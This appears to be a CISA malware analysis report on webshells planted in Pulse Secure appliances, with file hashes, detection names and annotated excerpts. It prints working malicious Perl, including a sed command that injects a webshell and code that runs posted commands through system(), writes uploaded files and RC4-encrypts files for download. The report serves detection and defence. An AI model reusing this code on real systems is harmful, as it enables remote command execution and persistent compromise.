MAR-10333243.r1.v1: Pulse Secure
Malware Characterization
//node() | //@*
This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.
cisa
2021-07-14T10:48:15-04:00
BMachine
40
7.1.0
";
print $console " complete\r\n";
}
else {
print $html " failed";
print $console " failed\r\n";
}
return $status == 0;
}
--End Malicious Code--
The patched in code will leverage the following SED command to patch a malicious webshell into the Pulse Secure system file “/pkg/do-install”:
--Begin Malicious SED Command--
my $cmd_x="sed -i '/echo_console \"Saving package\"/i(sed -i \\\'/main();\\\$/cif(CGI::param(\\\\\"id\\\\\")){print \\\\\"Cache-Control: no-cache\\\\\\\\n\\\\\";print \\\\\"Content-type: text/html\\\\\\\\n\\\\\\\\n\\\\\";my \\\\\$na=CGI::param(\\\\\"id\\\\\");system(\\\\\"\\\\\$na\\\");}else{&main();}\\\' /tmp/data/root$cgi_p;cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)' /pkg/do-install"
--End Malicious SED Command--
The purpose of the webshell is to accept a parameter named "id" from within an incoming web application post, and also copy another instance of the shell into the parameter '$cgi_p', which resolves to the legitimate file 'licenseserverproto.cgi'. The webshell will then process the data provided within the "id" parameter as an operating system command by executing it locally utilizing the system() function.]]>
DSUpgrade.pm
5270
Perl5 module source, ASCII text, with very long lines
MD5
d855ebd2adeaf2b3c87b28e77e9ce4d4
SHA1
1e43bc7cde1c2ac7b0db7b74b3be47334171d410
SHA256
a3b60b4bc4a5c7af525491ba37b570f90405aa83e36655da7d91bd68acaedf85
SHA512
d94795f11c04862b054d2f83babca034c20bfd00c2c0abe1e1fcfdb3854924a0d9944d0f168147060311d948b1bb194f27eaa491563e7b00ba58e776a4a6f676
SSDEEP
96:FYIFAu1JZtGm4OcAHgDfX27AF1K2dsvWlgzP5Ft8gb16rJ2yXp6uIvWZlGMQbvek:eIB1XcTfX20Dds+gF3Ar8yXp6uIyUMQB
5.03176
Related_To
licenseserverproto.cgi
2105
Perl script text executable
MD5
e50edf64239b84be02ee5902c22ab336
SHA1
1f26ef302ebc881380aa227ddd8eaebdad54679f
SHA256
d3982747d9b589ea20581b0448bddfd7c8a7cdad4760a99b4de762742833640a
SHA512
9acee1c2ca0ca24b76c2caab545abaea65e390b6b1f9e058e405bb438ce95eb20a0c1a10512f0b594ebab6dd5f8c0d5228eb3bcf0f8ba1a0f0a35fb0d3410eef
SSDEEP
48:ECLYmeAJAZo1BuswT4o7oo7vpBBBQWBZ7zSH72BZ7TtH7CN4/to7jH7XH76bejBv:E4YkJAZfv/wO27Y0
5.119005
Related_To
)
{
$fd=$fd.$_;
}
close(*FILE);
print "Content-Disposition: attachment;
filename=tmp\n\n";
print a($fd);
}
sub d [Decrypts a file using the (sub b) function above and writes out the file.]
{
print "Cache-Control: no-cache\n";
print "Content-type: text/html\n\n";
my $fi = CGI::param('cert');
$fi=b($fi);
my $pa=CGI::param('md5');
$pa=b($pa);
open (*outfile, ">$pa");
print outfile $fi;
close (*outfile);
}
sub e [Decrypts an incoming command and executes as system. If the command has the wrong parameter it returns "Error 404".]
{
print "Cache-Control: no-cache\n";
print "Content-type: image/gif\n\n";
my $na=CGI::param('name');
$na=b($na);my $rt;
if (!$na or $na eq "cd")
{
$rt="Error 404";
}
else
{
my $ot="/tmp/1";
system("$na >/tmp/1 2>&1");
open(*cmd_result,"<$ot");
while()
{
$rt=$rt.$_;
}
close(*cmd_result);
unlink $ot} print a($rt);
}
sub f [Responses to POST requests.]
{
if(CGI::param('cert')) [If it receives a file it attempts to write it.]
{
d();
}
elsif(CGI::param('img') and CGI::param('name')) [If it receives a command it attempts to execute it.]
{
c();
}
elsif(CGI::param('name') and CGI::param('img') eq "") [If it is unable to execute the command it sends "Error 404".]
{
e();
}
else # [Do normal processing.]
{
&main();
}
}
if ($ENV{'REQUEST_METHOD'} eq "POST") [If its a POST request follow (sub f) function above.]
{
f();
}
else
{
&main(); [Do normal processing.]
}
---End Malicious Code---
The last part of this file contains modified code that renders a dialog box that allows for the searching of files to be downloaded. Before downloading, the files are RC4 encrypted and base64 encoded. The program uses the hard-coded key for the RC4 encryption.]]>
healthcheck.cgi
9272
Perl script text executable
MD5
f23e94a38f0a93df46ba83786f3180e0
SHA1
2f1eddf6af9284f6b6c0a8b14fc3e5986ee601c7
SHA256
ec3dc5a11b66c5b3ab006ac786914de674e50d0b08c6f6d0cfe7247dbe67a496
SHA512
ec6b5f25ccdf9a251ff8ba10086820c4cf841e1d487f242edf1f6d7b1b2437f6b2fd12b80989c80a008fb5e7469713971afb39703df7ee556df24669a3124e0d
SSDEEP
192:5zwJNuIYj7rcCOk1QrhMeWyOUV9AWojcZiOQiQsfinnoK9Cih1pa+7yi3hm:5zwJwrXWOUV9AWojoiOujQ
5.114695
licenseserverproto.cgi
2104
Perl script text executable
MD5
a0ce730cffc65e6950c6a5d1d2de0ebb
SHA1
620bfbc94296271c3c6d71b97a8b5486d63347b3
SHA256
bef423bd85a25d14ffa511a0e04194e59b283057bd41689d473f79d227942c98
SHA512
c2102a112e7fd41cda15fbab438b6b849e072beaaf0650d209fb9b4350e260cb3a611eac3acf9f2aa6c8ce9be071aed1362db7619f14d94990d00cada4256b77
SSDEEP
48:E1LYmeAJAZo1BuswT4o7oo7vpBBBQWBZ7zSH72BZ7TtH7CN4/to7jH7XH76bejBv:EJYkJAZfv/wO27Y0
5.12004
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
d855ebd2adeaf2b3c87b28e77e9ce4d4
SHA1
1e43bc7cde1c2ac7b0db7b74b3be47334171d410
SHA256
a3b60b4bc4a5c7af525491ba37b570f90405aa83e36655da7d91bd68acaedf85
NCCIC
2021-07-14T16:34:39+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
e50edf64239b84be02ee5902c22ab336
SHA1
1f26ef302ebc881380aa227ddd8eaebdad54679f
SHA256
d3982747d9b589ea20581b0448bddfd7c8a7cdad4760a99b4de762742833640a
NCCIC
2021-07-14T16:34:39+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
f23e94a38f0a93df46ba83786f3180e0
SHA1
2f1eddf6af9284f6b6c0a8b14fc3e5986ee601c7
SHA256
ec3dc5a11b66c5b3ab006ac786914de674e50d0b08c6f6d0cfe7247dbe67a496
NCCIC
2021-07-14T16:34:40+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
a0ce730cffc65e6950c6a5d1d2de0ebb
SHA1
620bfbc94296271c3c6d71b97a8b5486d63347b3
SHA256
bef423bd85a25d14ffa511a0e04194e59b283057bd41689d473f79d227942c98
NCCIC
2021-07-14T16:34:40+00:00
MAEC Characterization of d855ebd2adeaf2b3c87b28e77e9ce4d4
ClamAV
Unix.Trojan.ATRIUM-9855919-0
trojan
webshell
MAEC Characterization of f23e94a38f0a93df46ba83786f3180e0
Symantec
Hacktool.Webshell
10333243.r1.v1
Malicious Code
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected